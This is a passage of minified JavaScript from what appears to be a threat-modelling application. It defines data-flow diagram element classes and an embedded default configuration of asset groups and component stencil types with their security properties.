ArrowPos(a){this.Data.ArrowPos=Number(a),this.ArrowPosChanged.emit(a)}ChangeDirection(){let a=this.Sender;this.Sender=this.Receiver,this.Receiver=a,a=this.SenderInterface,this.SenderInterface=this.ReceiverInterface,this.ReceiverInterface=a,this.DirectionChanged.emit()}GetProperty(a){var e;return!this.OverwriteProtocolProperties&&(null===(e=this.protocolProperties)||void 0===e?void 0:e.includes(a))?this.ProtocolStack.some(i=>i.GetProperty(a)):super.GetProperty(a)}SetProperty(a,e){super.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.Sender","Sender","",!0,Ii.ElementName,!0),this.AddProperty("properties.SenderInterface","SenderInterface","",!0,Ii.InterfaceElementSelect,!0),this.AddProperty("properties.Receiver","Receiver","",!0,Ii.ElementName,!0),this.AddProperty("properties.ReceiverInterface","ReceiverInterface","",!0,Ii.InterfaceElementSelect,!0),this.AddProperty("properties.Direction","","",!1,Ii.DataFlowChangeDirection,!0),this.AddProperty("properties.ShowName","ShowName","",!0,Ii.CheckBox,!0),this.AddProperty("properties.ShowProtocolDetails","ShowProtocolDetails","",!0,Ii.CheckBox,!0),this.AddProperty("properties.BendFlow","BendFlow","",!0,Ii.CheckBox,!0),this.AddProperty("properties.ArrowPos","ArrowPos","",!0,Ii.ArrowPosition,!0)}}os.Icon="timeline",os.ElementTypeID=Et.DataFlow;class Ys extends lc{constructor(a,e,i,n){super(a,e,i,n),this.ChildrenChanged=new Tt,this.Data.childrenIDs||(this.Data.childrenIDs=[]),this.Data.ElementTypeID=Et.None}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Ys.ElementTypeID);return e||(e=a.CreateStencilType(Ys.ElementTypeID),e.Name="DFD Container",e.IsDefault=!0),e}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetDFDElement(e))),a.sort((e,i)=>e.GroupId>=i.GroupId?1:-1)}get Root(){return this.project.GetDFDElement(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}AddChild(a){null!=a?a.ID!=this.ID&&(this.Data.childrenIDs.includes(a.ID)||(a.Parent=this,this.Data.childrenIDs.push(a.ID),this.project.AddDFDElement(a),a instanceof Ys&&(a.Root=this.Root?this.Root:this),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0))):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteDDFElement(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){let a=[];return a.push(...this.GetChildren()),this.GetChildren().forEach(e=>{e instanceof Ys&&a.push(...e.GetChildrenFlat())}),a}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}Ys.Icon="select_all",Ys.ElementTypeID=Et.None;class zm extends Ys{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.project=i,this.config=n,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.TypeChanged.subscribe(a=>this.TypeChanged.emit(a)))}static InstantiateRef(a,e,i){let n=new zm({},a.GetProperty("Type"),e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class M5 extends Ys{}class qp extends M5{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogTrustArea}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==qp.ElementTypeID);return e||(e=a.CreateStencilType(qp.ElementTypeID),e.Name="Trust Area",e.IsDefault=!0),e}}qp.ElementTypeID=Et.LogTrustArea;class jg extends M5{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyTrustArea}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==jg.ElementTypeID);return e||(e=a.CreateStencilType(jg.ElementTypeID),e.Name="Phy Trust Area",e.IsDefault=!0),e}}jg.ElementTypeID=Et.PhyTrustArea;const gwe=JSON.parse('{"Data":{"ID":"3bf9addd-53b8-4d01-9971-7128326f856d","Name":"Default Configuration","Description":"","Version":5,"threatLibraryID":"e17870ae-2c37-435c-a284-8df90ff7a5f0","DFDthreatRuleGroupsID":"1d995fc2-d7a5-4f46-ae16-954b8603b7fe","assetGroupID":"58e45260-36fa-43d7-ac37-198dcce12952","stencilThreatRuleGroupsID":"dc027a7a-9824-4b6a-befb-cc68270f2ecb","componentThreatRuleGroupsID":"b02f311c-0bb2-4057-9dde-6225ebbf4e1b","controlLibraryID":"6dd5db7a-e54f-4e6f-858a-33449024cf88"},"assetGroups":[{"ID":"58e45260-36fa-43d7-ac37-198dcce12952","Name":"Asset Groups","Description":"","assetGroupIDs":["cb2b51c2-63a8-4f7a-bf0b-a6ec8b248b78","148b81d8-2c0a-454d-a95c-d993e67c7266","fd5d32e6-212c-4b26-a129-d1a87d014c1d","9e0b09ae-246e-4000-b17d-ff71b142e881"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"9e0b09ae-246e-4000-b17d-ff71b142e881","Name":"Manufacturer Assets","Description":"","assetGroupIDs":["90d512d4-583d-47d1-a174-55d7441b7495"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"fd5d32e6-212c-4b26-a129-d1a87d014c1d","Name":"Owner Assets","Description":"","assetGroupIDs":["15dcf410-df02-4824-83e6-ef80b63a6da9","cb8c3cec-c2ec-444a-a148-9dec9825e92e"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"90d512d4-583d-47d1-a174-55d7441b7495","Name":"Intellectual Property (IP)","Description":"","assetGroupIDs":["e0abf169-5402-4fa6-bd56-49e6f154a6d6","354b8f5d-756b-400b-80cb-100182918021","1f2a21a0-c358-4140-861f-c795453f6322"],"assetIDs":["5eb076d6-7bb3-42bc-8727-d1c1b5933afc","ae6eb58b-6f72-470c-8ea3-ff7af01a201a","7fcf997f-5c00-4a8b-9ade-3e8325ad391e"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"148b81d8-2c0a-454d-a95c-d993e67c7266","Name":"User Assets","Description":"","assetGroupIDs":["3ba3acb5-8e8c-49cf-b9d9-86df13c39dd6","2d6f3914-6d2a-46ff-9699-56ec9f0f0034"],"assetIDs":["a0a5e6ff-950a-4da6-a757-ef134f1548b0","d0ed6d37-a544-43d1-b94d-4924cabbf26a"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"cb2b51c2-63a8-4f7a-bf0b-a6ec8b248b78","Name":"Common Assets","Description":"","assetGroupIDs":["abc10bed-01eb-4e3d-8743-f3a48b710844","95809a78-46fd-48a4-a840-d3271b11d71d"],"assetIDs":["346e2669-f5a1-4790-9033-e6937d5448a2"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"15dcf410-df02-4824-83e6-ef80b63a6da9","Name":"Physical Property","Description":"","assetGroupIDs":["9293377e-1a41-40fa-8bd7-e603c7b73fc2","e946820d-0adc-4b9a-a1b1-d7f361c7d82a"],"assetIDs":["fdd56e01-0633-4797-accc-b5c0207d6ebb","077e1f6d-094a-44d6-a8a1-1ac3978f00eb"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"cb8c3cec-c2ec-444a-a148-9dec9825e92e","Name":"Virtual Property","Description":"","assetGroupIDs":["f4a97cef-26dd-48c1-8cce-68d2cf6fab1d","51e182b7-5608-4f8c-9281-3e15725d1837"],"assetIDs":["f15e8bbe-77a8-4b91-bcda-92f4e1c2ed5d","c3910e35-3353-490f-9fc2-da60660e444c"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"95809a78-46fd-48a4-a840-d3271b11d71d","Name":"Functionality & Safety","Description":"","assetGroupIDs":["5e07e85d-cdb4-4c3f-8294-eba6d865eab6","76f4759e-f5d8-4b34-a142-969fbe754562"],"assetIDs":["4aa77061-1e91-430e-a662-6466f3926678","7f62763b-8816-4569-8455-b96788d9e479"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"5e07e85d-cdb4-4c3f-8294-eba6d865eab6","Name":"Logical Operations","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,14,5]},{"ID":"76f4759e-f5d8-4b34-a142-969fbe754562","Name":"Physical Operations","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,15,9,14]},{"ID":"3ba3acb5-8e8c-49cf-b9d9-86df13c39dd6","Name":"Collected Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[1,10,11]},{"ID":"2d6f3914-6d2a-46ff-9699-56ec9f0f0034","Name":"Health","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[9]},{"ID":"e0abf169-5402-4fa6-bd56-49e6f154a6d6","Name":"Hardware IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"354b8f5d-756b-400b-80cb-100182918021","Name":"Software IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"1f2a21a0-c358-4140-861f-c795453f6322","Name":"Process IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"9293377e-1a41-40fa-8bd7-e603c7b73fc2","Name":"Device","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[3,12,14]},{"ID":"e946820d-0adc-4b9a-a1b1-d7f361c7d82a","Name":"Environment","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[9,15]},{"ID":"f4a97cef-26dd-48c1-8cce-68d2cf6fab1d","Name":"Configuration","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,5]},{"ID":"51e182b7-5608-4f8c-9281-3e15725d1837","Name":"Generated Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,1,10]},{"ID":"abc10bed-01eb-4e3d-8743-f3a48b710844","Name":"Authentication Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[1,2,4,5,10]}],"myData":[],"stencilTypes":[{"Name":"Process","Description":"","ElementTypeID":11,"IsDefault":true,"ID":"e0b99432-98a6-4e32-86d7-ca5f58897cc2","Properties":[{"DisplayName":"Sanitizes Input","ID":"47889e58-6875-4fe5-aa04-91ea9054a166","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Sanitizes Output","ID":"5afac92d-d86d-49bc-8fd8-84242a651767","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Uses Authorization Mechanism","ID":"eb92cc8a-bceb-48a5-b0fd-0894a1d91c5c","Tooltip":"Implements or uses a mechanism for authorization","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Processor","Description":"","ElementTypeID":12,"IsDefault":true,"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Data Store","Description":"","ElementTypeID":21,"IsDefault":true,"Properties":[{"DisplayName":"Contains Logs","ID":"ContainsLogs","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Contains Sensitive Data","ID":"ContainsSensitiveData","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Contains User Data","ID":"ContainsUserData","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}],"ID":"c7598413-4382-43e9-9904-fd9d877eb7a9"},{"Name":"Phy Data Store","Description":"","ElementTypeID":22,"IsDefault":true,"Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Is Encrypted","ID":"IsEncrypted","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Checks Integrity","ID":"c31746fb-c296-4eda-b7a5-8227640e9c80","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Allows Boot","ID":"43deca38-18ab-4c2b-98f0-52f0b1bfefac","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Volatile","ID":"IsVolatile","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Removable","ID":"IsRemovable","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Writable","ID":"IsWritable","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is Multiple Writable","ID":"IsMultipleWritable","Editable":false,"Type":"Check Box","DefaultValue":true}],"ID":"80aa0465-21e0-41bd-b521-84a346c5f54b"},{"Name":"Ext. Entity","Description":"","ElementTypeID":31,"IsDefault":true,"ID":"02b39924-b8f2-44da-a2bc-be1bd2450f68","Properties":[{"DisplayName":"Allows User Input","ID":"7632a126-216a-4463-83ef-6ce82331d9f8","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Phy Ext. Entity","Description":"","ElementTypeID":32,"IsDefault":true,"ID":"03e3750c-8549-4589-8269-e0121b3f26a4","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Allows User Input","ID":"18571d26-3d51-45b8-96f0-ff6e273e70c6","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}]},{"Name":"Data Flow","Description":"","ElementTypeID":41,"IsDefault":true,"Properties":[{"DisplayName":"Uses Custom Com. Protocol","ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","Tooltip":"Implements or uses a custom communication protocol","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has JSON Payload","ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Overwrite Data","ID":"OverwriteDataProperties","Tooltip":"By default, processed data and data sensitivity are referenced from sender. Overwrite to set them manually","Editable":true,"HasGetter":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Protocol Stack","ID":"ProtocolStack","Tooltip":"List of protocols used within the communication","Editable":true,"HasGetter":true,"Type":"Protocol Select","DefaultValue":[]},{"DisplayName":"Overwrite Stack","ID":"OverwriteProtocolProperties","Tooltip":"Use either the properties derived from the protocols or define them manually","Editable":true,"HasGetter":true,"Type":"Check Box","DefaultValue":false}],"ID":"b395ada9-bc1d-4df9-b9f3-a1b09ee2a5aa"},{"Name":"Trust Area","Description":"","ElementTypeID":71,"IsDefault":true,"ID":"8f95badd-15c2-4bd6-9146-67b34f24c724","Properties":[]},{"Name":"Phy Trust Area","Description":"","ElementTypeID":72,"IsDefault":true,"ID":"edd93ea1-6122-492c-bbef-332ecf0113b3","Properties":[]},{"Name":"Physical Link","Description":"","ElementTypeID":51,"IsDefault":true,"ID":"04be7cf6-00dd-4aa8-b90b-e9bf105e39e7","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Is Sensor","ID":"NewProperty1","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is Actuator","ID":"NewProperty3","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"Name":"Interface","Description":"","ElementTypeID":61,"IsDefault":true,"Properties":[{"DisplayName":"Is Wireless","ID":"IsWireless","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Enables Access To Critical Function","ID":"db9caa64-fec1-47e8-9ed8-97896030cc90","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Requires Authentication","ID":"a5bb6218-f4e3-445f-95b3-1fc0be602d36","Tooltip":"Authentication is always required before performing any functionality","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"4e797b3d-fcdd-43ce-953e-8d5af2c47d91"},{"Name":"DFD Container","Description":"","ElementTypeID":0,"IsDefault":true,"ID":"02b4631b-a8fd-47f6-b264-cb5fcedd2b1a","Properties":[]},{"ID":"967a0727-3f2f-4fa8-a549-f9b7bd4efbc5","Name":"Subprocess","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Subprocess Diagram","ID":"SubprocessDiagram","HasGetter":false,"Editable":true,"Type":"Diagram Reference","DefaultValue":false},{"DisplayName":"Go To Subprocess","ID":"SubprocessDiagram","HasGetter":false,"Tooltip":"","Editable":false,"Type":"Diagram Reference"}],"ElementTypeID":11},{"Name":"Microprocessor","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Has Trusted Execution Environment","ID":"HasTrustedExecutionEnvironment","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Root of Trust","ID":"HasRootofTrust","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5"},{"Name":"ASIC","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Is Custom Design","ID":"IsCustomDesign","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is In-House Produced","ID":"IsIn-HouseProduced","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"6065e8dd-23c0-4dc9-ad51-628af88f3309"},{"Name":"Crypto Processor","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Has True RNG","ID":"HasTrueRNG","Editable":true,"Type":"Check Box","DefaultValue":true,"Tooltip":"Has True Random Number Generator (RNG)"},{"DisplayName":"Has PUF","ID":"HasPUF","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"7b968a35-bdd2-4dec-b54b-6fca0bc93058"},{"ElementTypeID":21,"Name":"File","Description":"","PropertyOverwrites":[],"ID":"9ebca319-a256-406b-b548-28a4b44f15b1","IsDefault":false,"Properties":[]},{"Name":"Config File","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[],"PropertyOverwrites":[],"ID":"9ebe3a8f-eedb-40cd-9cbf-d1012a1829e2"},{"Name":"User Database","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[{"DisplayName":"Password Is Hashed","ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Password Is Salted","ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","Tooltip":"Password hash is calculated of the joining of password and salt","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"ContainsUserData","Value":true}],"ID":"367702af-ceba-459b-84e5-27efe918968e"},{"Name":"Log File","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"ContainsLogs","Value":true}],"ID":"a74ba004-2165-4721-9b9b-2ce4b9df88c2"},{"Name":"SRAM","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[{"DisplayName":"Clears Content on State Transition","ID":"NewProperty1","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsVolatile","Value":true}],"ID":"69401648-0084-45ca-b984-505173c9cdb1"},{"Name":"FLASH","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"ID":"4409e854-5f53-4e7e-bee5-232c0e27fb40"},{"Name":"OTP","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsMultipleWritable","Value":false}],"ID":"44d3f1c3-d8cb-4fd8-bccf-1fe409b36992"},{"Name":"SD Card","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsRemovable","Value":true}],"ID":"1959aadb-553f-491d-9e5c-665245093d95"},{"Name":"USB Flash Drive","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsRemovable","Value":true}],"ID":"565e2ea5-b296-44b0-a5ca-8b4a06cfcc06"},{"ElementTypeID":31,"Name":"Browser","Description":"","ID":"049bfa6e-d0b9-4f8d-9920-dfaa78523c85","IsDefault":false,"Properties":[]},{"ID":"99f696a1-6684-4650-993c-d83d1cdb35a2","Name":"HTTP","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":41,"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["857c7b5e-e034-41f8-9b60-ee11aa9771f1"]}]},{"ElementTypeID":41,"Name":"HTTPS","Description":"","ID":"4ae2efbd-9c4e-4885-bdaa-ba9f34ed5c9b","IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["21731335-5e66-455c-9b6a-6796ac85577a"]}]},{"ElementTypeID":51,"Name":"Sensor","Description":"","ID":"dffbfc0a-850b-4de0-95fb-ab9ea4273d88","IsDefault":false,"Properties":[{"DisplayName":"Measures Human-related Value","ID":"13649f62-1bd6-4b50-9646-a9df988262a5","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"Name":"JTAG","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Disabled after Production","ID":"e8430761-3c2e-4db0-adbd-5310214574c2","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8"},{"Name":"CAN","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"f9209f6d-3f5b-4e72-8c03-75531058d0f2","templateDFDID":"ffd00d05-c506-4bf9-af35-0b0f56234515"},{"ID":"e1fea26b-dbcf-4c9f-af27-d7453687cded","Name":"UART","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61},{"Name":"SPI","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"c4967596-a83f-4530-84a6-afe75fec1a7b","templateDFDID":"0d2497f5-d83a-44ac-91ca-6453a7a0e2b4"},{"Name":"USB","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Supports HID Class","ID":"23564ce2-4786-4144-85b6-d03de2771d6b","Tooltip":"Supports HID (Human Interface Device) class, which is, for example, used for keyboard and mouse","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Supports Mass Storage Class","ID":"e884ecfe-bda1-4f0b-86f7-3ce0d735aeeb","Tooltip":"Supports mass storage class, which is, for example, used for storing files","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ID":"111a5819-f53f-4a8d-81df-6b756a20efe7","templateDFDID":"054dd0d3-961a-4f18-9aee-92ac1b515392"},{"Name":"Ethernet","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"58e0c62c-e5b7-4e9f-9f8a-f8150cf18930","templateDFDID":"fad91fd1-0a2b-4ab0-a069-5362948e5f47"},{"ID":"4edf4a31-e828-4933-9a87-779083e7167e","Name":"RF Module","Description":"Proprietary protocols, e.g. protocols that use the 860 MHz band","IsDefault":false,"Properties":[{"DisplayName":"Limits Duty Cycle","ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":61,"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"templateDFDID":"5135733f-bcb2-459e-a84b-048c832f5616"},{"Name":"WiFi","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Has WPS","ID":"8fbc9cce-7d30-425a-ac50-c5ca44d206b0","Tooltip":"Supports Wi-Fi Protected Setup (WPS)","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Uses WPA3","ID":"f7509951-f156-4774-89e9-1966b03ef03e","Tooltip":"Uses the Wi-Fi Protected Access 3 protocol","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"ID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","templateDFDID":"1ad7afbf-59a5-41ec-905e-621602e17ea6"},{"Name":"Bluetooth","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Has Secure Version","ID":"80419a47-0ac7-488f-b958-da045b67d91f","Tooltip":"At the time of writing, it is advised to use at least Bluetooh BR/EDR version 4.1 or Bluetooth LE version 4.2","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Secure Mode","ID":"cf1429d9-c9e7-4dc4-a54c-42596f246692","Tooltip":"Secure modes are numeric comparison, passkey entry and out of band. Just works is not secure.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Highest Security Level","ID":"a4f10f42-4b29-4cbf-a849-0844b011609b","Tooltip":"There are four security levels. The highest level, Security Level 4, should be used.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"ID":"2460a6c9-40e5-44c7-b133-10c6654efd18","templateDFDID":"f6abd33c-f527-4621-9a09-1ee5466aee01"},{"Name":"Internet Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[],"ID":"b76ebd30-234d-4704-bf27-ab3e0bf5ae97"},{"Name":"Company Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[{"DisplayName":"Has Network Monitoring","ID":"6e0c2499-9e6b-42da-8e9c-c34d40fca0db","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"4a5bbdcf-ef9a-49cb-ac4c-a05dcefd95d2"},{"Name":"Local Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[],"ID":"9f80b636-e7a4-4782-b529-24235055ebe3"},{"ID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","Name":"Device Casing","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is 